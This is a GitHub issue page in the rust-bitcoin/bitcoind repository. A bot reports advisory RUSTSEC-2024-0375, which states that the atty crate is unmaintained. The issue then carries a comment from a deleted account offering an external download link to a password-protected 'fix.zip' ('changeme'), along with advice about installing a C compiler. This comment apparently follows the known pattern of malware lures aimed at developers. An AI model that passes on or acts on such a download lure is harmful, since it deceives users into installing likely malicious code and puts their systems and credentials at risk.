rust-bitcoin / bitcoind

Utility to launch a regtest bitcoind process in a rust test
MIT License
41 stars 35 forks source link

RUSTSEC-2024-0375: `atty` is unmaintained #166

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

atty is unmaintained

Details
Status unmaintained
Package atty
Version 0.2.14
URL https://github.com/softprops/atty/issues/57
Date 2024-09-25

The maintainer of atty has published an official notice that the crate is no longer under development, and that users should instead rely on the functionality in the standard library's IsTerminal trait.

Alternative(s)

See advisory page for additional details.

ghost commented 2 months ago

I think this will help you. https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler